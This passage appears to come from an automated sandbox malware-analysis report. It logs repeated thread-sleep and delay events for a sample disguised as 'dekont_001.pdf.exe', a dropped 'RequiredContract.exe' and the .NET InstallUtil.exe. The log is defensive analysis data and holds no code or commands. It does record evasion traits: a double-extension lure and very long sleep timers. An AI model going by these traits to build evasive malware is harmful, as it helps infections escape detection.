Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598216s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -597202s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596960s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596857s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596744s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -596078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595964s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595637s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594649s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594294s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594148s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7540	Thread sleep time: -594046s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7920	Thread sleep count: 4681 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7920	Thread sleep count: 5139 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -98905s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -98783s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -98667s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -98219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -98095s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97515s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97187s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96404s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -96046s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -95926s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -95635s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -95500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -95391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -95281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -95172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -95059s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -94937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -94828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -94718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -94609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -94500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -94391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RequiredContract.exe TID: 7888	Thread sleep time: -94266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8084	Thread sleep count: 8107 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8084	Thread sleep count: 1753 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598115s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597778s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -596030s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -595046s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080	Thread sleep time: -594609s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99764	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98765	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98650	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98546	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98418	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98307	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98192	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 98029	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97921	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97812	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97703	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97594	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97469	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97250	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97140	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 97031	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96922	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96812	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96703	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96593	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96484	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96375	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96265	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96156	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 96047	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95937	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95828	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95658	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95544	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95433	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95316	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95203	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 95093	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94984	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94875	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94765	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Thread delayed: delay time: 94651	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599736	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598216	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596960	Jump to behavior
